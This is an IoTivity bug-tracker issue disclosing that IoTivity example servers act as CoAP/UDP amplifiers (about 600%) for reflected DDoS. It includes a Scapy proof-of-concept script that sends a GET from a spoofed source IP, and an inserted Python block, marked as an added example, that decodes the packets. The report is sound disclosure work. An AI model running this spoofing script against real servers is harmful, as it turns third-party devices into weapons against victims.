IoTivity
IOT-3267

Traffic amplification of UDP packets


    Details

    • Type: Bug
    • Status: Reopened
    • Priority: P2
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Primitive Service
    • Labels: None
    • Found in Version/s: Current (HEAD-5349dad)
    • Issue Severity: Major
    • Reproducibility: Always (100%)
    • Bugzilla ID: None

      Description

      An IoTivity server at the current version (HEAD-5349dad, taken from GitHub) can be used as a network amplifier in Distributed Denial of Service attacks when the source IP address of the request is spoofed.

      After receiving a CoAP GET message (53 bytes long), the IoTivity server responds with 6 CoAP packets (each 62 bytes long):

      ###[ CoAP ]###
      ver = 1L
      type = CON
      tkl = 0L
      code = 4.01 Unauthorized
      msg_id = 1881
      token = ''
      options = [('Uri-Path', 'test')]
      paymark = ''
      ------------------------------------

      Together the six response packets total 372 bytes, which gives a 600% amplification factor (calculated as size_of_output / size_of_input - 1).
      The server sends the responses to the source IP address of that first packet without requiring any prior exchange with the client, so a request with a spoofed source IP address can be used for Distributed Denial of Service.
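      The request bytes used in this report and the packet sizes quoted above, decoded and checked in an added Python 3 example (it is not part of the original report or of the IoTivity code base). The CoAP header and option parser follows the RFC 7252 encoding; the 9-byte 4.01 response is reconstructed here from the Scapy dump above and is a constructed sample, and the assess_reflection function, its field names and its flag rule are this example's own, not anything the report or IoTivity defines.

```python
import struct

# CoAP message types (RFC 7252, section 3)
COAP_TYPES = {0: "CON", 1: "NON", 2: "ACK", 3: "RST"}

# Human-readable names for the 8-bit code field, keyed by the raw byte
COAP_CODE_NAMES = {0x01: "GET", 0x02: "POST", 0x03: "PUT", 0x04: "DELETE",
                   0x45: "Content", 0x80: "Bad Request", 0x81: "Unauthorized",
                   0x84: "Not Found"}

# Option numbers that matter for URI handling (RFC 7252, section 5.10)
COAP_OPTIONS = {3: "Uri-Host", 7: "Uri-Port", 11: "Uri-Path",
                12: "Content-Format", 15: "Uri-Query"}

# Request payload taken verbatim from this report: CON GET, msg_id 1881, Uri-Path "test"
REQUEST_HEX = "40010759b474657374"
# Constructed sample: the 4.01 Unauthorized response as described by the dump above
# (same type, msg_id and Uri-Path option; only the code byte differs: 0x81 = 4.01)
RESPONSE_HEX = "40810759b474657374"

# Datagram sizes as measured in the report (bytes on the wire)
REQUEST_LEN = 53
RESPONSE_LEN = 62
RESPONSE_COUNT = 6


def coap_code(code):
    """Render the code byte as 'class.detail name', e.g. 0x81 -> '4.01 Unauthorized'."""
    text = "%d.%02d" % (code >> 5, code & 0x1F)
    name = COAP_CODE_NAMES.get(code)
    return text + " " + name if name else text


def _read_extended(nibble, raw, pos):
    """Resolve a 4-bit option delta/length nibble, consuming extension bytes if present."""
    if nibble < 13:
        return nibble, pos
    if nibble == 13:
        return raw[pos] + 13, pos + 1
    if nibble == 14:
        return struct.unpack("!H", raw[pos:pos + 2])[0] + 269, pos + 2
    raise ValueError("nibble value 15 is reserved outside the payload marker")


def parse_coap(raw):
    """Parse a CoAP datagram into its header fields, token, options and payload."""
    if len(raw) < 4:
        raise ValueError("CoAP header needs at least 4 bytes")
    first = raw[0]
    version, msg_type, tkl = first >> 6, (first >> 4) & 0x3, first & 0xF
    if version != 1 or tkl > 8:
        raise ValueError("not a valid CoAP message")
    msg_id = struct.unpack("!H", raw[2:4])[0]
    pos = 4
    token = raw[pos:pos + tkl]
    pos += tkl
    options, payload, number = [], b"", 0
    while pos < len(raw):
        byte = raw[pos]
        pos += 1
        if byte == 0xFF:          # payload marker: everything after it is payload
            payload = raw[pos:]
            break
        delta, pos = _read_extended(byte >> 4, raw, pos)
        length, pos = _read_extended(byte & 0xF, raw, pos)
        number += delta           # option numbers are delta-encoded
        options.append((COAP_OPTIONS.get(number, "Opt-%d" % number), raw[pos:pos + length]))
        pos += length
    return {"version": version, "type": COAP_TYPES[msg_type], "tkl": tkl,
            "code": coap_code(raw[1]), "msg_id": msg_id, "token": token,
            "options": options, "payload": payload}


def amplification_factor(request_len, response_lens):
    """The report's metric: total bytes sent back divided by bytes received, minus one."""
    return sum(response_lens) / request_len - 1


def assess_reflection(request_raw, request_len, response_raw, response_count, response_len):
    """Summarise one request/response exchange the way a reviewer of this bug would.

    The flag fires when a single unauthenticated request yields more bytes than it
    cost and the replies are confirmable (CON) messages: a CON response is
    retransmitted until acknowledged (RFC 7252, section 4.2), so a spoofed source
    that never acknowledges keeps receiving copies.
    """
    req, resp = parse_coap(request_raw), parse_coap(response_raw)
    factor = amplification_factor(request_len, [response_len] * response_count)
    return {"request": req["code"], "response": resp["code"],
            "responses_per_request": response_count,
            "amplification_factor": factor,
            "confirmable_responses": resp["type"] == "CON",
            "flag": factor > 0 and resp["type"] == "CON"}


if __name__ == "__main__":
    report = assess_reflection(bytes.fromhex(REQUEST_HEX), REQUEST_LEN,
                               bytes.fromhex(RESPONSE_HEX), RESPONSE_COUNT, RESPONSE_LEN)
    for key, value in report.items():
        print("%-22s %s" % (key, value))
```

      Run stand-alone, the script prints the decoded request (0.01 GET, msg_id 1881, Uri-Path "test"), the 4.01 response, the six-to-one response ratio and the factor of roughly 6.0 (602%, which the report rounds to 600%). The one-line fix direction the flag points at is the usual CoAP one: answer a CON request with a single piggybacked ACK carrying the error code instead of separate confirmable responses.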

      The issue was tested and reproduced for the following example IoTivity server applications:

      • devicediscoveryserver
      • fridgeserver
      • garageserver
      • groupserver
      • lightserver
      • presenceserver
      • roomserver
      • simpleclientserver
      • simpleserver
      • simpleserverHQ

      The issue can be reproduced with the following Python 2 script (it requires the Scapy library and sudo in order to spoof the source IP address):

      ---------------------------------------------------------------------------------------------------

      import sys
      from scapy.all import *

      # CoAP CON GET, msg_id 1881, Uri-Path "test" (the request shown above), as a hex string
      IOTIVITY_PAYLOAD = "40010759b474657374"
      data = IOTIVITY_PAYLOAD.decode('hex')  # Python 2: hex string -> raw bytes

      # argv[1] = spoofed source IP, argv[2] = source port, argv[3] = IoTivity server IP;
      # 5683 is the default CoAP UDP port
      packet = IP(src=sys.argv[1], dst=sys.argv[3])/UDP(sport=int(sys.argv[2]), dport=5683)/Raw(data)

      # Send once and keep capturing replies for 5 s (multi=1 does not stop at the first answer)
      sr(packet, timeout=5, multi=1)

      ---------------------------------------------------------------------------------------------------

      Execution of the script:

      sudo python iotivity_test.py src_ip src_port dst_ip

      where src_ip and src_port are the IP address and port of the spoofed source client, and dst_ip is the IP address of the tested IoTivity server (listening on port 5683), e.g.:

      sudo python iotivity_test.py 1.1.1.1 50000 192.168.0.101

      For an IoTivity example application started with the following command on a server with IP 192.168.0.101:

      ./simpleserver

      the CoAP responses will be sent to 1.1.1.1:50000.


            People

            • Assignee: avolkov Aleksey Volkov
            • Reporter: CVEReporting CVE Reporting